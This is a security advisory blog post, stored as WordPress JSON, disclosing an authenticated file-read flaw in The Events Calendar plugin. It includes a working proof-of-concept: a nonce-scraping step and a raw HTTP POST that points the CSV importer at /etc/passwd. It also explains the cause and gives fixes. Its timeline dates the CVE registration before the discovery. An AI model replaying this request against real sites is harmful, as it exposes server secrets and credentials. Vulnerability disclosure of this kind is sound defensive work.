{"id":3513,"date":"2026-03-10T05:42:12","date_gmt":"2026-03-10T05:42:12","guid":{"rendered":"https:\/\/research.cleantalk.org\/?p=3513"},"modified":"2026-03-10T05:42:13","modified_gmt":"2026-03-10T05:42:13","slug":"cve-2026-3585","status":"publish","type":"post","link":"https:\/\/research.cleantalk.org\/cve-2026-3585\/","title":{"rendered":"CVE-2026-3585\u00a0– The Events Calendar – LFI Author+ – POC"},"content":{"rendered":"\n

CVE-2026-3585<\/strong> affects The Events Calendar and its Event Aggregator import workflow. It is an authenticated Local File Inclusion issue in the CSV import path where a low privilege user who can manage event imports can point the importer at an arbitrary local path and force the server to open it as if it were a CSV file. Even though this does not look like code execution, the security impact is serious because it turns an editorial role into a tool for\u00a0reading sensitive server files<\/strong>\u00a0that were never meant to be exposed through the application. Given the plugin\u2019s large install base around 700k plus, this becomes especially relevant on multi author sites and organizations where event staff have elevated content permissions but should not have access to server level secrets.<\/p>\n\n\n\n

CVE<\/td>CVE-2026-3585<\/strong><\/td><\/tr>
Plugin Version<\/td>The Events Calendar <= 6.15.17<\/a><\/td><\/tr>
All Time<\/td>80 233 333<\/strong><\/td><\/tr>
Active installations<\/td>700 000+<\/strong><\/td><\/tr>
Publicly Published<\/td>March 9, 2026<\/td><\/tr>
Last Updated<\/td>March 9, 2026<\/td><\/tr>
Researcher<\/td>Dmitrii Ignatyev<\/td><\/tr>
PoC<\/td>Yes<\/td><\/tr>
Exploit<\/td>No<\/td><\/tr>
Reference <\/td>https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2026-3585<\/a>
https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/wordpress-plugins\/the-events-calendar\/the-events-calendar-61517-authenticated-author-arbitrary-file-read-via-ajax-create-import<\/a>
https:\/\/t.me\/cleantalk_researches\/382<\/a><\/td><\/tr>
Plugin Security Certification by CleanTalk<\/td> \"\"
<\/a><\/td><\/tr>
Logo of the plugin<\/td>\"\"<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\n
\n
\n

Join the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.<\/p>\n<\/div>\n\n\n\n

\n
\n
Get Plugin Security Certificate<\/a><\/div>\n<\/div>\n<\/div>\n<\/div>\nPSC by Cleantalk<\/cite><\/blockquote>\n\n\n\n

Timeline<\/strong><\/h2>\n\n\n\n
March 3, 2026<\/td>Plugin testing and vulnerability detection in the The Event Calendar<\/strong> have been completed<\/td><\/tr>
March 3, 2026<\/td>I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing<\/td><\/tr>
January 8, 2026<\/td>Registered CVE-2026-3585<\/strong><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Discovery of the Vulnerability<\/strong><\/h2>\n\n\n\n

The vulnerable behavior sits in the Event Aggregator AJAX import flow. A user controlled value in\u00a0aggregator[csv][file]<\/code>\u00a0is accepted by the import creation handler and persisted into the import record metadata as a file path without enforcing a safe directory allow list. The server then resolves the path with\u00a0realpath<\/code>\u00a0and proceeds to open it via the CSV reader using\u00a0SplFileObject<\/code>. The critical mistake is that\u00a0realpath<\/code>\u00a0only canonicalizes the path, it does not enforce that the file belongs to an approved directory such as uploads or a dedicated import folder. As a result, a path like\u00a0\/etc\/passwd<\/code>\u00a0or another readable local file can be treated as a source file for import processing, which is the essence of\u00a0path based authorization failure<\/strong>\u00a0in file handling code.<\/p>\n\n\n\n

Understanding of LFI attack’s<\/strong><\/h2>\n\n\n\n

Local File Inclusion issues in WordPress plugins are often high severity because WordPress deployments keep sensitive data in predictable locations. A classic target is\u00a0wp-config.php<\/code>\u00a0which can expose database credentials and authentication salts, and on many hosts additional secrets are present in environment files, debug logs, or deployment artifacts. Even system files like\u00a0\/etc\/passwd<\/code>\u00a0can be valuable because they reveal usernames and service accounts that help attackers tailor later exploitation. In shared hosting and container deployments, the directory structure often contains neighboring app configs, backups, or mounted secrets. When a plugin lets an authenticated user open arbitrary readable paths, it can become a stepping stone from a simple author account to\u00a0full compromise through credential theft<\/strong>. This is why LFI is not just information disclosure. It frequently becomes a pivot into database access and account takeover.<\/p>\n\n\n\n

Exploiting the LFI <\/strong><\/strong>Vulnerability<\/strong><\/h2>\n\n\n\n

To exploit CVE-2026-3585<\/strong>, an attacker with Author+ cookies:<\/p>\n\n\n\n

\n

POC<\/strong>:<\/p>\n\n\n\n

Go to http:\/\/138.124.55.33\/wp-admin\/edit.php?post_type=tribe_events&page=aggregator and grep \"tribe_aggregator_nonce\" nonce\n\nPOST \/wp-admin\/admin-ajax.php HTTP\/1.1\nHost: 138.124.55.33\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:140.0) Gecko\/20100101 Firefox\/140.0\nAccept: *\/*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http:\/\/138.124.55.33\/wp-admin\/edit.php?post_type=tribe_events&page=aggregator\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 194\nOrigin: http:\/\/138.124.55.33\nDNT: 1\nSec-GPC: 1\nConnection: keep-alive\nCookie: AUTHOR+\n\naction=tribe_aggregator_create_import&tribe_aggregator_nonce=431f15e9b5&aggregator[origin]=csv&aggregator[csv][content_type]=tribe_events&aggregator[csv][file]=\/etc\/passwd&aggregator[action]=new\n<\/code><\/pre>\n\n\n\n
____<\/p>\n<\/blockquote>\n\n\n\n
The most damaging outcome is disclosure of configuration and secret material that enables follow on compromise. If an attacker can read WordPress config or environment secrets, they can pivot to database extraction, credential reuse, and long term persistence. On sites with staging and production on the same host, directory enumeration and file reads can expose deployment pipelines, API keys, and backups. For organizations that run events at scale, a compromised author account is realistic through phishing or credential reuse, and this bug would convert that foothold into server level intelligence. The risk is amplified because the import feature is often enabled for operational convenience, and admins may grant event editors broader permissions than they realize. This makes the vulnerability a practical target for\u00a0quiet credential theft<\/strong>\u00a0rather than noisy defacement.<\/p>\n\n\n\n
Recommendations for Improved Security<\/strong><\/strong><\/h2>\n\n\n\n
The correct fix is strict path policy. The importer must enforce that the CSV file path resides only within an approved directory, typically uploads or a dedicated aggregator import directory, using\u00a0realpath<\/code>\u00a0on both the candidate path and the base directory and then performing a prefix check. Any absolute path outside the allowed base must be rejected before the import record is created. It is also important to disallow direct filesystem paths entirely and require uploads through WordPress media handling, storing only attachment IDs rather than paths. On the authorization side, access to the aggregator import endpoints should be restricted to trusted roles only, and nonces should be validated as request integrity controls but not treated as authorization. As an operational mitigation, site owners should review which roles can access Event Aggregator, disable CSV import if it is not needed, and rotate secrets if there is any suspicion of exposure, especially database credentials and API keys.<\/p>\n\n\n\n
\n
By taking proactive measures to address LFI <\/strong><\/strong><\/strong> like CVE-2026-3585<\/strong> WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.<\/p>\n\n\n\n
#WordPressSecurity #LFI<\/strong><\/strong><\/strong> #WebsiteSafety #StayProtected #HighVulnerability<\/p>\n\n\n\n
Use CleanTalk <\/a>solutions to improve the security of your website<\/strong><\/p>\nDmitrii I.<\/cite><\/blockquote>\n","protected":false},"excerpt":{"rendered":"
CVE-2026-3585 affects The Events Calendar and its Event Aggregator import workflow. It is an authenticated Local File Inclusion issue in the CSV import path where a low privilege user who can manage event imports can point the importer at an arbitrary local path and force the server to open it as if it were a CSV file. Even though this does not look like code execution, the security impact is serious because it turns an editorial role into a tool for reading sensitive server files that were never meant to be exposed through the application. Given the plugin\u2019s large install base around 700k plus, this becomes especially relevant on multi author sites and organizations where event staff have elevated content permissions but should not have access to server level secrets.<\/p>\n","protected":false},"author":2,"featured_media":15,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,1],"tags":[],"class_list":["post-3513","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cve","category-security","","tg-column-two"],"yoast_head":"\nCVE-2026-3585\u00a0- The Events Calendar - LFI Author+ - POC - Plugin Security Certification (PSC) by CleanTalk<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/research.cleantalk.org\/cve-2026-3585\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2026-3585\u00a0- The Events Calendar - LFI Author+ - POC - Plugin Security Certification (PSC) by CleanTalk\" \/>\n<meta property=\"og:description\" content=\"CVE-2026-3585 affects The Events Calendar and its Event Aggregator import workflow. It is an authenticated Local File Inclusion issue in the CSV import path where a low privilege user who can manage event imports can point the importer at an arbitrary local path and force the server to open it as if it were a CSV file. Even though this does not look like code execution, the security impact is serious because it turns an editorial role into a tool for reading sensitive server files that were never meant to be exposed through the application. Given the plugin\u2019s large install base around 700k plus, this becomes especially relevant on multi author sites and organizations where event staff have elevated content permissions but should not have access to server level secrets.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/research.cleantalk.org\/cve-2026-3585\/\" \/>\n<meta property=\"og:site_name\" content=\"Plugin Security Certification (PSC) by CleanTalk\" \/>\n<meta property=\"article:published_time\" content=\"2026-03-10T05:42:12+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-10T05:42:13+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"750\" \/>\n\t<meta property=\"og:image:height\" content=\"750\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Dmitrii I\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Dmitrii I\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/\"},\"author\":{\"name\":\"Dmitrii I\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/#\\\/schema\\\/person\\\/c33902690394680520b3d4925861bc8b\"},\"headline\":\"CVE-2026-3585\u00a0– The Events Calendar – LFI Author+ – POC\",\"datePublished\":\"2026-03-10T05:42:12+00:00\",\"dateModified\":\"2026-03-10T05:42:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/\"},\"wordCount\":875,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/research.cleantalk.org\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/New_1_not_safe-1.png\",\"articleSection\":[\"CVE\",\"Security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/\",\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/\",\"name\":\"CVE-2026-3585\u00a0- The Events Calendar - LFI Author+ - POC - Plugin Security Certification (PSC) by CleanTalk\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/research.cleantalk.org\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/New_1_not_safe-1.png\",\"datePublished\":\"2026-03-10T05:42:12+00:00\",\"dateModified\":\"2026-03-10T05:42:13+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/#\\\/schema\\\/person\\\/c33902690394680520b3d4925861bc8b\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/#primaryimage\",\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/New_1_not_safe-1.png\",\"contentUrl\":\"https:\\\/\\\/research.cleantalk.org\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/New_1_not_safe-1.png\",\"width\":750,\"height\":750},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2026-3585\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/research.cleantalk.org\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2026-3585\u00a0– The Events Calendar – LFI Author+ – POC\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/#website\",\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/\",\"name\":\"Plugin Security Certification (PSC) by CleanTalk\",\"description\":\"Use only certified WordPress plugins for your website\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/research.cleantalk.org\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/#\\\/schema\\\/person\\\/c33902690394680520b3d4925861bc8b\",\"name\":\"Dmitrii I\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g\",\"caption\":\"Dmitrii I\"},\"sameAs\":[\"https:\\\/\\\/blog.cleantalk.org\"],\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/author\\\/dmitrii-ignatyev\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2026-3585\u00a0- The Events Calendar - LFI Author+ - POC - Plugin Security Certification (PSC) by CleanTalk","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/research.cleantalk.org\/cve-2026-3585\/","og_locale":"en_US","og_type":"article","og_title":"CVE-2026-3585\u00a0- The Events Calendar - LFI Author+ - POC - Plugin Security Certification (PSC) by CleanTalk","og_description":"CVE-2026-3585 affects The Events Calendar and its Event Aggregator import workflow. It is an authenticated Local File Inclusion issue in the CSV import path where a low privilege user who can manage event imports can point the importer at an arbitrary local path and force the server to open it as if it were a CSV file. Even though this does not look like code execution, the security impact is serious because it turns an editorial role into a tool for reading sensitive server files that were never meant to be exposed through the application. Given the plugin\u2019s large install base around 700k plus, this becomes especially relevant on multi author sites and organizations where event staff have elevated content permissions but should not have access to server level secrets.","og_url":"https:\/\/research.cleantalk.org\/cve-2026-3585\/","og_site_name":"Plugin Security Certification (PSC) by CleanTalk","article_published_time":"2026-03-10T05:42:12+00:00","article_modified_time":"2026-03-10T05:42:13+00:00","og_image":[{"width":750,"height":750,"url":"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png","type":"image\/png"}],"author":"Dmitrii I","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Dmitrii I","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/research.cleantalk.org\/cve-2026-3585\/#article","isPartOf":{"@id":"https:\/\/research.cleantalk.org\/cve-2026-3585\/"},"author":{"name":"Dmitrii I","@id":"https:\/\/research.cleantalk.org\/#\/schema\/person\/c33902690394680520b3d4925861bc8b"},"headline":"CVE-2026-3585\u00a0– The Events Calendar – LFI Author+ – POC","datePublished":"2026-03-10T05:42:12+00:00","dateModified":"2026-03-10T05:42:13+00:00","mainEntityOfPage":{"@id":"https:\/\/research.cleantalk.org\/cve-2026-3585\/"},"wordCount":875,"commentCount":0,"image":{"@id":"https:\/\/research.cleantalk.org\/cve-2026-3585\/#primaryimage"},"thumbnailUrl":"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png","articleSection":["CVE","Security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/research.cleantalk.org\/cve-2026-3585\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/research.cleantalk.org\/cve-2026-3585\/","url":"https:\/\/research.cleantalk.org\/cve-2026-3585\/","name":"CVE-2026-3585\u00a0- The Events Calendar - LFI Author+ - POC - Plugin Security Certification (PSC) by CleanTalk","isPartOf":{"@id":"https:\/\/research.cleantalk.org\/#website"},"primaryImageOfPage":{"@id":"https:\/\/research.cleantalk.org\/cve-2026-3585\/#primaryimage"},"image":{"@id":"https:\/\/research.cleantalk.org\/cve-2026-3585\/#primaryimage"},"thumbnailUrl":"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png","datePublished":"2026-03-10T05:42:12+00:00","dateModified":"2026-03-10T05:42:13+00:00","author":{"@id":"https:\/\/research.cleantalk.org\/#\/schema\/person\/c33902690394680520b3d4925861bc8b"},"breadcrumb":{"@id":"https:\/\/research.cleantalk.org\/cve-2026-3585\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/research.cleantalk.org\/cve-2026-3585\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/research.cleantalk.org\/cve-2026-3585\/#primaryimage","url":"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png","contentUrl":"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png","width":750,"height":750},{"@type":"BreadcrumbList","@id":"https:\/\/research.cleantalk.org\/cve-2026-3585\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/research.cleantalk.org\/"},{"@type":"ListItem","position":2,"name":"CVE-2026-3585\u00a0– The Events Calendar – LFI Author+ – POC"}]},{"@type":"WebSite","@id":"https:\/\/research.cleantalk.org\/#website","url":"https:\/\/research.cleantalk.org\/","name":"Plugin Security Certification (PSC) by CleanTalk","description":"Use only certified WordPress plugins for your website","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/research.cleantalk.org\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/research.cleantalk.org\/#\/schema\/person\/c33902690394680520b3d4925861bc8b","name":"Dmitrii I","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g","caption":"Dmitrii I"},"sameAs":["https:\/\/blog.cleantalk.org"],"url":"https:\/\/research.cleantalk.org\/author\/dmitrii-ignatyev\/"}]}},"_links":{"self":[{"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/posts\/3513","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/comments?post=3513"}],"version-history":[{"count":1,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/posts\/3513\/revisions"}],"predecessor-version":[{"id":3515,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/posts\/3513\/revisions\/3515"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/media\/15"}],"wp:attachment":[{"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/media?parent=3513"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/categories?post=3513"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/tags?post=3513"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}